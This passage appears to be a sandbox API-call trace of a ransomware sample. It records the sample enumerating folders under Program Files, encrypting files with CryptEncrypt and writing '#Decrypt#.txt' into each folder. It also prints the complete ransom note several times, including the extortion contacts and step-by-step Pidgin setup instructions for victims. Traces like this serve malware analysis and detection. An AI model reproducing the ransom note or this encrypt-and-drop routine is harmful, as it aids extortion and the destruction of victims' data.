\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0234.274] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.275] lstrlenA (lpString="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") returned 1368 [0234.275] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.275] CloseHandle (hObject=0x158) returned 1 [0234.276] GetProcessHeap () returned 0x780000 [0234.276] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.276] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0234.276] lstrcmpiW (lpString1="sv-SE", lpString2="Windows") returned -1 [0234.276] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE") returned 60 [0234.276] lstrcmpW (lpString1="sv-SE", lpString2=".") returned 1 [0234.276] lstrcmpW (lpString1="sv-SE", lpString2="..") returned 1 [0234.276] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.276] GetProcessHeap () returned 0x780000 [0234.277] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7db828 [0234.277] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\*") returned 62 [0234.277] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.278] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.278] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\.") returned 62 [0234.278] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.278] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.278] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.278] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\..") returned 63 [0234.278] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.278] lstrcmpW (lpString1="..", lpString2="..") returned 
0 [0234.278] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe779eb51, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe79d9fc4, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe79d9fc4, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.278] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.278] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\tipresx.dll.mui") returned 76 [0234.278] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.278] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.278] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.278] lstrlenW (lpString=".testttjffg") returned 11 [0234.278] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.278] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.278] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.278] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.279] 
FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe779eb51, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe79d9fc4, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe79d9fc4, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.279] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.279] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\#Decrypt#.txt") returned 74 [0234.280] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.281] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0234.281] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.282] lstrlenA (lpString="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") returned 1368 [0234.282] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.282] CloseHandle (hObject=0x158) returned 1 [0234.282] GetProcessHeap () returned 0x780000 [0234.282] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.282] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56ef1310, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x56ef1310, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x449d3e50, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x9e00, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="TabIpsps.dll", cAlternateFileName="")) returned 1 [0234.282] lstrcmpiW (lpString1="TabIpsps.dll", lpString2="Windows") returned -1 [0234.282] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll") returned 67 [0234.282] StrStrIW (lpFirst="TabIpsps.dll", lpSrch=".horseleader") returned 0x0 [0234.282] lstrcmpW (lpString1="TabIpsps.dll", lpString2="#Decrypt#.txt") returned 1 [0234.282] lstrcmpW (lpString1="TabIpsps.dll", lpString2="_uninstalling_.png") returned 1 [0234.282] lstrlenW (lpString=".testttjffg") returned 11 [0234.282] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\ink\\TabIpsps.dll", lpSrch=".testttjffg") returned 0x0 [0234.283] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.283] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.283] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabipsps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.283] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bf05363, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8bf05363, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8bf05363, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x6d600, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="tabskb.dll", cAlternateFileName="")) returned 1 [0234.283] lstrcmpiW (lpString1="tabskb.dll", lpString2="Windows") returned -1 [0234.283] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll") returned 65 [0234.283] StrStrIW (lpFirst="tabskb.dll", lpSrch=".horseleader") returned 0x0 [0234.283] lstrcmpW (lpString1="tabskb.dll", lpString2="#Decrypt#.txt") returned 1 [0234.283] lstrcmpW (lpString1="tabskb.dll", lpString2="_uninstalling_.png") returned 1 [0234.283] lstrlenW (lpString=".testttjffg") returned 11 [0234.283] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll", lpSrch=".testttjffg") returned 0x0 
[0234.283] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.283] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.283] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabskb.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.284] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45c03bb8, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x45c03bb8, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xf8825d20, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x36c00, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="TabTip.exe", cAlternateFileName="")) returned 1 [0234.284] lstrcmpiW (lpString1="TabTip.exe", lpString2="Windows") returned -1 [0234.284] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabTip.exe") returned 65 [0234.284] StrStrIW (lpFirst="TabTip.exe", lpSrch=".horseleader") returned 0x0 [0234.284] lstrcmpW (lpString1="TabTip.exe", lpString2="#Decrypt#.txt") returned 1 [0234.284] lstrcmpW (lpString1="TabTip.exe", lpString2="_uninstalling_.png") returned 1 [0234.284] lstrlenW (lpString=".testttjffg") returned 11 [0234.284] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabTip.exe", lpSrch=".testttjffg") returned 0x0 [0234.284] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: 
pbBuffer=0x32aed10) returned 1 [0234.284] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.284] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabTip.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabtip.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.285] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="th-TH", cAlternateFileName="")) returned 1 [0234.285] lstrcmpiW (lpString1="th-TH", lpString2="Windows") returned -1 [0234.285] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH") returned 60 [0234.285] lstrcmpW (lpString1="th-TH", lpString2=".") returned 1 [0234.285] lstrcmpW (lpString1="th-TH", lpString2="..") returned 1 [0234.285] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.285] GetProcessHeap () returned 0x780000 [0234.285] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.285] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\*") returned 62 [0234.285] 
FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.286] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.286] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\.") returned 62 [0234.286] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.286] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.286] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.286] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\..") returned 63 [0234.286] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.286] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.286] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8f46414, ftCreationTime.dwHighDateTime=0x1ca0420, 
ftLastAccessTime.dwLowDateTime=0xe91a79e4, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe91a79e4, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.286] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.286] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\tipresx.dll.mui") returned 76 [0234.286] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.286] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.286] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.286] lstrlenW (lpString=".testttjffg") returned 11 [0234.286] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.286] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.286] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.287] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.287] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8f46414, ftCreationTime.dwHighDateTime=0x1ca0420, 
ftLastAccessTime.dwLowDateTime=0xe91a79e4, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe91a79e4, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.287] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.287] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\#Decrypt#.txt") returned 74 [0234.287] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.287] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0234.287] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.288] lstrlenA (lpString="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") returned 1368 [0234.288] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.289] CloseHandle (hObject=0x158) returned 1 [0234.289] GetProcessHeap () returned 0x780000 [0234.289] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.289] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41bbeec8, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x41bbeec8, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44c363f0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x1b000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="TipBand.dll", cAlternateFileName="")) returned 1 [0234.289] lstrcmpiW (lpString1="TipBand.dll", lpString2="Windows") returned -1 [0234.289] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll") returned 66 [0234.289] StrStrIW (lpFirst="TipBand.dll", lpSrch=".horseleader") returned 0x0 [0234.289] lstrcmpW (lpString1="TipBand.dll", lpString2="#Decrypt#.txt") returned 1 [0234.289] lstrcmpW (lpString1="TipBand.dll", lpString2="_uninstalling_.png") returned 1 [0234.289] lstrlenW (lpString=".testttjffg") returned 11 [0234.289] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
